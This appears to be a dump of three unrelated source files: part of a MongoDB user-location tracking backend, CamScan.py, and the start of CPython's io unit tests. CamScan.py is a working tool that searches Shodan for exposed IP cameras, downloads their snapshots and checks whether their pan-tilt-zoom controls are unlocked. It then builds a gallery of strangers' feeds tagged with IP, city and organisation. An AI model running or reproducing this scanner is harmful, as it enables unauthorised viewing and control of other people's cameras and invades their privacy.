u_bulk.find(f).upsert().update_one({"$set": d})
d = None
f = None
return count
except Exception as e:
error_print(e)
return None
def UpdateUser(self, ids):
db = self.connect.get_database(global_db_name)
uniset = {}
try:
t_coll = db.get_collection(global_db_origin_collection)
for i in ids:
if i not in uniset:
uniset[i] = {}
else:
continue
f = {"id": i}
n = t_coll.find(f).count()
uniset[i]["ocount"] = n
t_coll = db.get_collection(global_db_calc_collection)
for key in uniset:
f = {"id": key}
n = t_coll.find(f).count()
uniset[key]["pcount"] = n
t_coll = db.get_collection(global_db_user_collection)
u_bulk = t_coll.initialize_unordered_bulk_op()
for key in uniset:
u_bulk.find({"id": key}).update({"$set": uniset[key]})
result = u_bulk.execute()
count = result['nModified']
return count
except Exception as e:
error_print(e)
return None
def NearPoint(self, lat, lng, count):
if not count:
count = 20
point = {"type": "Point", "coordinates": [lng, lat]}
f = {"loc": {"$near": {"$geometry": point}}}
c = {"_id": 0, "loc":1, "id": 1, "time": 1, "level": 1, "distance": 1}
db = self.connect.get_database(global_db_name)
coll = db.get_collection(global_db_calc_collection)
it = coll.find(f, c) ## sort by $near
ret = {}
for one in it:
if len(ret) >= count:
break
try:
if one['id'] not in ret:
ret[one['id']] = one
continue
if one['level'] > 0 and one['level'] < ret[one['id']]['level']:
ret[one['id']] = one
continue
if one['time'] > ret[one['id']]['time']:
ret[one['id']] = one
continue
except Exception as e:
continue
if not ret:
return None
c = {"_id": 0, "name": 1, "time": 1, "id": 1, "ocount": 1, "pcount": 1,
"img":1, "sign": 1, global_key_gender: 1}
coll = db.get_collection(global_db_user_collection)
for key in ret:
tmp = ret[key]
ret[key] = {global_key_uid: key,
"time": tmp["time"],
"latitude": tmp["loc"]["coordinates"][1],
"longitude": tmp["loc"]["coordinates"][0],
"distance": tmp["distance"]
}
f = {"id": key}
try:
it = coll.find(f, c).sort("time", pymongo.DESCENDING).limit(1)
for one in it:
ret[key].update(one)
except Exception as e:
pass
if ret:
tmp = []
for key in ret:
tmp.append(ret[key])
ret = tmp
return ret
## update by user
'''
UI action
'''
def create_filter_for_user(self, obj):
regex_list = ["name", "sign", "province", "city"]
bool_list = {"country": "CN"}
select_list = {"gender": ("female", "male")}
match_list = ["id", "device"]
gte_list = ["ocount", "pcount"]
time_list = ["start", "end"]
for key in ["ocount", "pcount"]:
if key in obj and obj[key] is not None:
obj[key] = int(obj[key])
f = {}
for key in obj:
if not obj[key]:
continue
if key in regex_list:
f[key] = {'$regex': obj[key], '$options': "i"}
continue
if key in bool_list:
if obj[key] == bool_list[key]:
f[key] = obj[key]
else:
f[key] = {"$not": {"$eq": bool_list[key]}}
continue
if key in select_list:
try:
s = str(obj[key]).lower()
if s in select_list[key]:
f[key] = s
except Exception as e:
pass
continue
if key in match_list:
f[key] = obj[key]
continue
if key in gte_list:
f[key] = {"$gte": obj[key]}
continue
if key in time_list:
obj[key] = string_standard(obj[key])
if "time" not in f:
f["time"] = {}
if key == "start":
f["time"]["$gte"] = obj[key]
elif key == "end":
f["time"]["$lte"] = obj[key]
continue
return f
def create_row_for_user(self):
return {"_id": 0,
"name": 1, "time": 1, "id": 1,
"device": 1, "ocount": 1, "pcount": 1,
"country":1, "province":1, "city":1,
"img":1, "sign": 1, global_key_gender: 1}
def show_search(self, obj):
f = self.create_filter_for_user(obj)
c = self.create_row_for_user()
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_user_collection)
r = collection.find(f, c).sort("time", pymongo.DESCENDING)
ret = []
for d in r:
ret.append(d)
return ret
except Exception as e:
error_print(e)
return None
def show_name(self, name):
f = self.create_filter_for_user({"name": name})
c = self.create_row_for_user()
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_user_collection)
r = collection.find(f, c).sort("time", pymongo.DESCENDING)
ret = []
for d in r:
ret.append(d)
return ret
except Exception as e:
error_print(e)
return None
def origin_points(self, id, start, end):
f = {"id": id}
if start:
f["time"]={}
f["time"]["$gte"]=start
if end:
if "time" not in f:
f["time"]={}
f["time"]["$lte"]=end
c = {"_id":0, "loc.coordinates": 1, "time": 1, "distance": 1, "sendtime": 1}
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_origin_collection)
r = collection.find(f, c).sort("time", pymongo.DESCENDING)
ret = []
for d in r:
tmp = {}
if "loc" in d and "coordinates" in d["loc"] and len(d["loc"]["coordinates"]) > 1:
tmp["latitude"] = d["loc"]["coordinates"][1]
tmp["longitude"] = d["loc"]["coordinates"][0]
else:
continue
if "time" in d:
tmp["time"] = d["time"]
else:
continue
if "sendtime" in d:
tmp["sendtime"] = d["sendtime"]
if "distance" in d:
tmp["distance"] = d["distance"]
ret.append(tmp)
return ret
except Exception as e:
error_print(e)
return None
def origin_points_uni(self, id, start, end):
f = {"id": id}
if start:
f["time"]={}
f["time"]["$gte"]=start
if end:
if "time" not in f:
f["time"]={}
f["time"]["$lte"]=end
c = {"_id":0, "loc.coordinates": 1, "time": 1, "distance": 1, "sendtime": 1}
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_origin_collection)
r = collection.find(f, c).sort("time", pymongo.DESCENDING)
uniset = {}
min_time = None
for d in r:
tmp = {}
if "loc" in d and "coordinates" in d["loc"] and len(d["loc"]["coordinates"]) > 1:
tmp["latitude"] = d["loc"]["coordinates"][1]
tmp["longitude"] = d["loc"]["coordinates"][0]
else:
continue
if "time" in d:
tmp["time"] = d["time"]
else:
continue
if "sendtime" in d:
tmp["sendtime"] = d["sendtime"]
if "distance" in d:
tmp["distance"] = d["distance"]
if not min_time or min_time["time"] > tmp["time"]:
min_time = tmp;
if (tmp["latitude"], tmp["longitude"]) not in uniset or uniset[(tmp["latitude"], tmp["longitude"])]["time"] < tmp["time"]:
uniset[(tmp["latitude"], tmp["longitude"])] = tmp;
ret = []
if min_time:
if (min_time["latitude"], min_time["longitude"]) in uniset and uniset[(min_time["latitude"], min_time["longitude"])]["time"] == min_time["time"]:
del uniset[(min_time["latitude"], min_time["longitude"])]
ret.append(min_time)
for one in uniset.itervalues():
ret.append(one)
return ret
except Exception as e:
error_print(e)
return None
'''
Device Action
'''
def set_device(self, task, device, la, lo):
f = {"device": device, "task": task}
data ={"$set": {"device": device,
"loc": {"type": "Point", "coordinates" : [lo, la]},
"time": time_now()} }
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_device_collection)
r = collection.update_one(f, data, True)
return r.modified_count or r.upserted_id
except Exception as e:
error_print(e)
return None
def device_obj(self, task, data):
try:
obj = json.loads(data)
tmp = []
task_len = len(task)
max_name = ''
name = "!"
for one in obj:
if "latitude" not in one or "longitude" not in one:
continue
name = "!"
if "device" in one and one["device"][0:task_len] == task:
name = str(one["device"])
if max_name < name:
max_name = name
tmp.append((name, one["latitude"], one["longitude"]))
tmp = sorted(tmp, key=lambda x: x[0])
number = 0
if max_name:
try:
number = int(max_name[task_len:])
except Exception as e:
error_print(e)
pass
if number < 1:
number = 1
else:
number += 1
ret = {}
for one in tmp:
name = one[0]
if name in ret or name == "!":
name = "{0}{1:04d}".format(task, number)
number += 1
ret[name] = (one[1], one[2])
return ret
except Exception as e:
error_print(e)
pass
return None
def setall_device(self, task, data):
# find all task point
# loop data
# bulk insert update delete
#
#
obj = self.device_obj(task, data)
if not obj:
if data is None:
return None
### remove all
return self.delete_all_device(task)
f = {"task": task}
c = {"_id": 1, "device": 1, "loc": 1, "time": 1}
action = []
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_device_collection)
bulk = collection.initialize_unordered_bulk_op()
it = collection.find(f, c).sort("time", pymongo.DESCENDING)
count = 0
for one in it:
if "device" not in one or one["device"] not in obj:
bulk.find({"_id": one["_id"]}).remove()
count += 1
continue
tmp = obj[one["device"]]
data = {
"$set": {
"device": one["device"],
"loc":{"type": "Point", "coordinates": [tmp[1], tmp[0]]},
"time": time_now(),
"task": task
}
}
bulk.find({"_id": one["_id"]}).upsert().update(data)
count += 1
del obj[one["device"]]
for key in obj:
data = {
"device": key,
"loc": {"type": "Point", "coordinates": [obj[key][1], obj[key][0]]},
"time": time_now(),
"task": task
}
bulk.insert(data)
count += 1
result = bulk.execute()
count = result['nInserted'] + result['nUpserted'] + result['nModified'] + result['nRemoved']
if count:
return self.get_device_all(task)
return None
def get_device(self, task, device):
f = {"device": device, "task": task}
c = {"_id": 0, "device": 1, "loc": 1, "time": 1}
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_device_collection)
r = collection.find(f, c).sort("time", pymongo.DESCENDING)
ret = []
for d in r:
ret.append({ "device": d["device"],
"time": d["time"],
"latitude": d["loc"]["coordinates"][1],
"longitude": d["loc"]["coordinates"][0],
})
return ret
except Exception as e:
error_print(e)
return None
def delete_device(self, task, device):
f = {"device": device, "task": task}
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_device_collection)
return collection.delete_one(f).deleted_count > 0
except Exception as e:
error_print(e)
return None
def delete_all_device(self, task):
f = {"task": task}
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_device_collection)
return collection.delete_many(f).deleted_count
except Exception as e:
error_print(e)
return None
def get_device_all(self, task):
f = {"task": task}
c = {"_id": 0, "device": 1, "loc": 1, "time": 1}
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_device_collection)
r = collection.find(f, c).sort([("device", pymongo.ASCENDING), ("time", pymongo.DESCENDING)])
t = {}
for d in r:
if d['device'] not in t:
t[d['device']] = {}
elif t[d['device']]['time'] > d["time"]:
continue
t[d['device']]['time'] = d["time"]
t[d['device']]['latitude'] = d["loc"]["coordinates"][1]
t[d['device']]['longitude'] = d["loc"]["coordinates"][0]
ret = []
for d in t:
ret.append( {
'device': d,
'time': t[d]['time'],
'latitude': t[d]['latitude'],
'longitude': t[d]['longitude'],
} )
return ret
except Exception as e:
error_print(e)
return None
def delete_information(self, t):
if not t:
return None
try:
db = self.connect.get_database(global_db_name)
count = 0
collection = None
if t == "users":
collection = db.get_collection(global_db_user_collection)
elif t == "device":
collection = db.get_collection(global_db_device_collection)
elif t == "points":
collection = db.get_collection(global_db_origin_collection)
elif t == "result":
collection = db.get_collection(global_db_calc_collection)
if not collection:
return count
result = collection.delete_many({})
if result:
count = result.deleted_count
return count
except Exception as e:
error_print(e)
return None
global_unique_opt_obj = None
global_unique_opt_obj_mx = threading.Lock()
def get_unique_opt():
global global_unique_opt_obj
global global_unique_opt_obj_mx
global_unique_opt_obj_mx.acquire()
if not global_unique_opt_obj:
try:
global_unique_opt_obj = opt()
except Exception as e:
global_unique_opt_obj = None
error_print(e)
pass
global_unique_opt_obj_mx.release()
return global_unique_opt_obj
def unique_push_data(data):
obj = get_unique_opt()
if not obj:
return None
return obj.producer(data)
def unique_check_and_calc(id, start, end, tunit):
obj = get_unique_opt()
if not obj:
return None
start = string_standard(start)
end = string_standard(end)
ret = obj.check_and_calc(id, start, end, tunit)
return ret
def unique_origin_points(id, start, end):
obj = get_unique_opt()
if not obj:
return None
start = string_standard(start)
end = string_standard(end)
ret = obj.origin_points(id, start, end)
return ret
def unique_show_name(name):
obj = get_unique_opt()
if not obj:
return None
ret = obj.show_search({"name":name})
return ret
def unique_show_search(args):
obj = get_unique_opt()
if not obj:
return None
ret = obj.show_search(args)
return ret
def unique_set_device(task, device, la, lo):
obj = get_unique_opt()
if not obj:
return None
ret = obj.set_device(task, device, la, lo)
return ret
def unique_setall_device(task, data):
obj = get_unique_opt()
if not obj:
return None
ret = obj.setall_device(task, data)
return ret
def unique_get_device(task, device):
obj = get_unique_opt()
if not obj:
return None
ret = obj.get_device(task, device)
return ret
def unique_get_device_all(task):
obj = get_unique_opt()
if not obj:
return None
ret = obj.get_device_all(task)
return ret
def unique_delete_device(task, device):
obj = get_unique_opt()
if not obj:
return None
ret = obj.delete_device(task, device)
return ret
def unique_delete_information(t):
obj = get_unique_opt()
if not obj:
return None
ret = obj.delete_information(t)
return ret
def unique_NearPoint(lat, lng, count):
obj = get_unique_opt()
if not obj:
return None
ret = obj.NearPoint(lat, lng, count)
return ret
|
CamScan.py
|
import requests
from shodan import Shodan
from time import sleep,time,localtime
import os
import threading
import webbrowser
import csv
class CamScan:
def __init__(self, dirname='Images', search=None,
path=None, timeout=7, verbose=False):
self.search = search
self.path = path
self.dirname = dirname
self.timeout = timeout
self.pages = {0: None}
self.verbose = verbose
self.api = None
self.live_hosts = []
self.checkPTZ = False
self.checkPTZPath = None
self.store_offline = True
try:
keyfile = open('shodan_api_key','r')
key = keyfile.readline()
keyfile.close()
self.api = Shodan(key)
except FileNotFoundError:
print('Key file not found')
DIR_NUMBER = 2
while os.path.exists(self.dirname):
self.dirname = self.dirname.strip('0987654321') + str(DIR_NUMBER)
DIR_NUMBER += 1
def initShodan(self, key):
with open('shodan_api_key','w') as file:
file.write(key)
self.api = Shodan(key)
def chooseFromCSV(self, file):
if os.path.exists(file):
f = open(file, newline='')
data = csv.DictReader(f)
searches = []
print('Select search from below:\n')
y = 0
for x in data:
item = []
item.append(x['searchQuery'])
item.append(x['imagePath'])
item.append(x['ptzCheckPath'])
item.append(x['friendlyName'])
print(str(y) + ") " + x['friendlyName'])
searches.append(item)
y += 1
f.close()
print("\nSearches marked with (Free) don't require a paid Shodan account to use")
print("Searches marked with [PTZ] support checking for locked PTZ controls")
try:
choice = int(input('Choose search: '))
self.search = searches[choice][0]
self.path = searches[choice][1]
self.checkPTZPath = searches[choice][2]
self.friendly_name = searches[choice][3]
except ValueError:
print("That's not a number...")
except IndexError:
print("That's not one of the choices...")
except Exception:
print("You're an idiot...")
else:
raise FileNotFoundError
def pagesCount(self):
hosts = self.api.count(self.search)['total']
return int(hosts / 100) + 1
def setPages(self, pages_str):
self.pages = {}
if type(pages_str) == str:
for num in pages_str.split(','):
if '-' in num:
r = num.split('-')
for number in range(int(r[0]),int(r[1]) + 1):
self.pages[int(number)] = None
else:
self.pages[int(num)] = None
elif pages_str == None:
self.pages = None
else:
raise Exception("Page value needs to be a string, or None")
def requestAndDownload(self, shodan_result):
host = str(shodan_result['ip_str'])
port = str(shodan_result['port'])
url = 'http://{}:{}'.format(host,port) + self.path
self.total += 1
try:
r = requests.get(url, timeout=self.timeout)
if r.status_code == 200:
filename = '{}-{}'.format(host,port) + '.png'
if self.store_offline == True:
with open(filename, 'wb') as img:
img.write(r.content)
if self.checkPTZ and self.checkPTZPath:
ptz_url = 'http://{}:{}'.format(host,port) + self.checkPTZPath
ptz_request = requests.get(ptz_url, timeout=self.timeout)
bad_codes = [x for x in range(400,512)]
if ptz_request.status_code not in bad_codes:
if self.verbose:
print('[Info] Connection to {}:{} successfull, camera possibly controllable'.format(host,port))
self.ptz_count += 1
self.live_hosts.append([filename,shodan_result,True])
else:
if self.verbose:
print('[Info] Connection to {}:{} successfull, camera controls locked'.format(host,port))
self.live_hosts.append([filename,shodan_result,False])
else:
if self.verbose:
print('[Info] Connection to {}:{} successfull'.format(host,port))
self.live_hosts.append([filename,shodan_result,False])
self.success_count += 1
else:
self.failed_count += 1
if self.verbose:
print('[HTTP {} Error] Connection to {}:{} failed'.format(r.status_code,host,port))
except requests.exceptions.ReadTimeout:
self.failed_count += 1
if self.verbose:
print('[Network Error] Connection to {}:{} timed out'.format(host,port))
except Exception as e:
self.failed_count += 1
#print(e)
if self.verbose:
print('[Network Error] Connection to {}:{} failed'.format(host,port))
def _runOnPage(self, pagenumber):
r = self.pages[pagenumber]
if self.verbose:
print("[Info] Contacting hosts on page",pagenumber)
for result in r['matches']:
x = threading.Thread(target=self.requestAndDownload, args=(result,))
self.threads.append(x)
x.start()
#for thread in threads:
# thread.join()
def shodanSearch(self):
if self.api == None:
raise Exception('Shodan API key not set')
else:
for pageNum in self.pages:
if self.verbose:
print("[Info] Searching shodan on page",pageNum)
tries = 0
while self.pages[pageNum] == None:
try:
self.pages[pageNum] = self.api.search(self.search, page=pageNum)
except Exception as e:
tries += 1
if "upgrade your API plan" in e.args[0]:
print("[Fatal error] Paid Shodan account required for pages and search filters.")
self.end = True
break
if tries == 35:
print("[Fatal Error] Shodan not responding correctly, giving up")
self.end = True
break
print("[API Error]", e, "- Retrying...")
sleep(1.5)
def run(self):
self.success_count = 0
self.failed_count = 0
self.ptz_count = 0
self.total = 0
self.end = False
self.threads = []
if self.pages == None:
self.pages = {}
for page in range(1,self.pagesCount() + 1):
self.pages[page] = None
os.mkdir(self.dirname)
os.chdir(self.dirname)
print('Saving images to', os.getcwd(), '\n')
threading.Thread(target=self.shodanSearch).start()
print("[Info] Starting...")
start_time = time()
t = localtime()
self.start_time_str = "{}/{}/{} {}:{}:{}".format(t[1],t[2],t[0],t[3],t[4],t[5])
for page in self.pages:
while self.pages[page] == None and not self.end:
sleep(.1)
if not self.end:
self._runOnPage(page)
for thread in self.threads:
thread.join()
if self.verbose:
print("[Info] Completed")
self.time_elapsed = time() - start_time
def generatePage(self,open_on_completion=True):
if self.checkPTZ and self.checkPTZPath:
ptz_box = '''
<div class="thing">
<label for="ptz_box">Hide hosts with closed PTZ controls:</label>
<input id="ptz_box" type="checkbox" onchange="ptzCheckBox()">
</div>'''
else:
ptz_box = ""
html = '''<!DOCTYPE html>
<html>
<head>
<title>'''+self.friendly_name+'''</title>
<script>
function changeColumns() {
let columns = parseInt(document.getElementById('cols').value);
let gallery = document.getElementsByClassName("gallery")[0];
let images = document.getElementsByTagName("img");
let s = "";
let h;
for (let i = 0; i < columns; i++ ) {
s += "auto ";
}
gallery.style.gridTemplateColumns = s;
switch (columns) {
case 2:
h = 700;
break;
case 3:
h = 480;
break;
case 4:
h = 300;
break;
}
for (let i = 0; i < images.length; i++) {
images[i].height = h;
}
}
let nonptz_list = [];
let all_items = [];
let not_ran = true;
function ptzCheckBox() {
const gal = document.getElementsByClassName("gallery")[0];
let all = gal.getElementsByClassName("item");
let box = document.getElementById("ptz_box");
let nonptz_items = gal.getElementsByClassName("nonptz");
if (not_ran) {
for (let i = 0; i < gal.childElementCount; i++) {
all_items.push(all[i]);
}
not_ran = false;
}
for (let i = 0; i < nonptz_items.length; i++) {
nonptz_list.push(nonptz_items[i]);
}
if (box.checked) {
for (let i = 0; i < nonptz_list.length; i++) {
nonptz_list[i].remove()
}
} else {
for (let i = 0; i < all_items.length; i++) {
all_items[i].remove();
}
for (let i = 0; i < all_items.length; i++) {
gal.appendChild(all_items[i]);
}
}
}
</script>
<style>
button {
border: none;
border-radius: 5px;
outline: none;
color: white;
padding: 5px 40px;
text-align: center;
text-decoration: none;
display: inline-block;
font-size: 16px;
margin: 5px 2px;
cursor: pointer;
transition-duration: 0.2s;
background-color: #386fc2;
}
button.shodan_button {
background-color: #be473c
}
button:hover {
background-color: #305896;
}
.shodan_button:hover {
background-color: #a63c32;
}
.gallery {
display: grid;
grid-template-columns: auto auto auto auto;
grid-template-rows: auto;
grid-gap: 10px;
}
.gallery img {
width: 100%;
}
.gallery .item {
position: relative;
overflow: hidden;
}
.gallery .item img {
vertical-align: middle;
}
.gallery .caption {
margin: 0;
padding: .5em;
position: absolute;
z-index: 1;
bottom: 0;
left: 0;
width: 100%;
max-height: 100%;
overflow: auto;
box-sizing: border-box;
transition: transform 0.2s;
transform: translateY(100%);
background: rgba(0, 0, 0, 0.4);
color:white;
font-family: Arial;
}
.gallery .item:hover .caption {
transform: translateY(0%);
}
h1 {
font-family: Arial;
color: white;
}
label {
font-family: Courier New;
color: white;
}
div.container{
display: flex;
background: linear-gradient(#8f8f8f, #757575);
padding: 10px;
border-radius: 17px;
margin-bottom: 8px;
margin: 20px;
}
div.section {
flex: auto;
width: 33%;
}
div.thing {
margin: 5px;
}
.stats_table {
float: right;
font-family: Courier New;
color: white;
}
</style>
</head>
<body style="background-color:black" onload="changeColumns()">
<div class="container">
<div class="section">
<div class="thing">
<label for="cols">Columns:</label>
<select id="cols" onchange="changeColumns()">
<option value="2">2</option>
<option value="3">3</option>
<option value="4" selected="selected">4</option>
</select>
</div>'''+ptz_box+'''
</div>
<div class="section" style="text-align: center;">
<h1>'''+self.friendly_name+'''</h1>
</div>
<div class="section">
<table class="stats_table">
<tr>
<td>Query:</td>
<td>'''+self.search+'''</td>
</tr>
<tr>
<td>Count:</td>
<td>'''+str(self.success_count)+''' open, '''+str(self.failed_count)+''' closed</td>
</tr>
<tr>
<td>Ran at:</td>
<td>'''+self.start_time_str+'''</td>
</tr>
</table>
</div>
</div>
<div class=gallery>
'''
with open('images.html', 'w') as page:
page.write(html)
no_dupes = []
for h in self.live_hosts:
if h not in no_dupes:
no_dupes.append(h)
for host in no_dupes:
link = 'http://' + host[1]['ip_str'] + ':' + str(host[1]['port'])
if self.store_offline == True:
img_src = host[0]
if os.path.getsize(host[0]) <= 1:
continue
else:
img_src = link + self.path
if host[2]:
classname = "item ptz"
else:
classname = "item nonptz"
if self.checkPTZ and self.checkPTZPath:
if host[2]:
ptz_controls_tr = '''
<tr>
<td>PTZ Controls:</td>
<td style="font-weight: bold;">Authorized</td>
</tr>'''
else:
ptz_controls_tr = '''
<tr>
<td>PTZ Controls:</td>
<td style="font-weight: bold;">Unauthorized</td>
</tr>'''
else:
ptz_controls_tr = ""
data = (classname,
img_src,
host[1]['ip_str'],
host[1]['location']['city'],
host[1]['location']['country_name'],
host[1]['org'],
ptz_controls_tr,
link,
host[1]['ip_str'])
element = f'''
<div class="%s">
<img src="%s" onerror="this.parentElement.remove()">
<span class="caption">
<table style="margin: auto;color:white;">
<tr>
<td>IP Address:</td>
<td style="font-weight: bold;">%s</td>
</tr>
<tr>
<td>City:</td>
<td style="font-weight: bold;">%s</td>
</tr>
<tr>
<td>Country:</td>
<td style="font-weight: bold;">%s</td>
</tr>
<tr>
<td>Organization:</td>
<td style="font-weight: bold;">%s</td>
</tr>%s
</table>
<div style="text-align: center;">
<a href="%s" target="_blank" style="text-decoration: none">
<button type="submit" class="stream_button">Open stream in new tab</button>
</a>
<a href="https://www.shodan.io/host/%s" target="_blank" style="text-decoration: none">
<button class="shodan_button">Shodan Page</button>
</a>
</div>
</span>
</div>
''' % data
try:
page.write(element)
except UnicodeEncodeError:
if self.verbose:
print("[Unicode Error] That was wierd. UnicodeEncodeError for host", host[1]['ip_str'])
pass
page.write('\n\t</div>\n</body>\n</html>')
if open_on_completion:
webbrowser.open('images.html')
def info(self):
print('search:', self.search)
print('path:', self.path)
print('dirname', self.dirname)
print('timeout:', self.timeout)
try:
print('pages:', len(self.pages))
except TypeError:
print('pages:', None)
print("checkPTZ:", self.checkPTZ)
print("checkPTZPath:", self.checkPTZPath)
def stats(self):
if self.total != 0:
percent_success = int((self.success_count / self.total) * 100)
percent_failure = int((self.failed_count / self.total) * 100)
else:
percent_success = 0
percent_failure = 0
s = "{} out of {} hosts are viewable, {}% success rate".format(self.success_count,self.total,percent_success)
t = "Time elapsed: " + str(int(self.time_elapsed)) + " seconds"
u = "{} hosts found with potentially open PTZ controls".format(self.ptz_count)
return [s,t,u,percent_success,percent_failure]
|
test_io.py
|
"""Unit tests for the io module."""
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import assert_python_ok, run_python_until_end
import codecs
import io
import _pyio as pyio
try:
import threading
except ImportError:
threading = None
try:
import ctypes
except ImportError:
def byteslike(*pos, **kw):
return array.array('b', bytes(*pos, **kw))
else:
def byteslike(*pos, **kw):
"""Create a bytes-like object having no string or sequence methods"""
data = bytes(*pos, **kw)
obj = EmptyStruct()
ctypes.resize(obj, len(data))
memoryview(obj).cast('B')[:] = data
return obj
class EmptyStruct(ctypes.Structure):
pass
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, 'r', encoding='latin-1') as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0
def tell(self):
return 0
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b''
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation('not seekable')
def tell(self, *args):
raise self.UnsupportedOperation('not seekable')
def truncate(self, *args):
raise self.UnsupportedOperation('not seekable')
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b''.join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
self._write_stack.append(b[:n])
return n
else:
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b'blah.'), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b'blah.'), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b'Hello.'), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b' world\n\n\n')
self.assertEqual(f.write(buffer), 9)
buffer[:] = b'*' * 9
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b'h'), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b'hello')
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(bytes(data), b' worl')
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b'd\n')
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b'hello world\n')
self.assertEqual(f.read(1), b'')
self.assertEqual(f.readinto(byteslike(b'x')), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b'world')
self.assertEqual(f.read(0), b'')
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b' worl')
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b'hello world\n')
f.seek(6)
self.assertEqual(f.read(), b'world\n')
self.assertEqual(f.read(), b'')
f.seek(0)
data = byteslike(5)
self.assertEqual(f.readinto1(data), 5)
self.assertEqual(bytes(data), b'hello')
LARGE = 2 ** 31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
try:
self.assertEqual(f.seek(self.LARGE), self.LARGE)
except (OverflowError, ValueError):
self.skipTest('no largefile support')
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b'xxx'), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
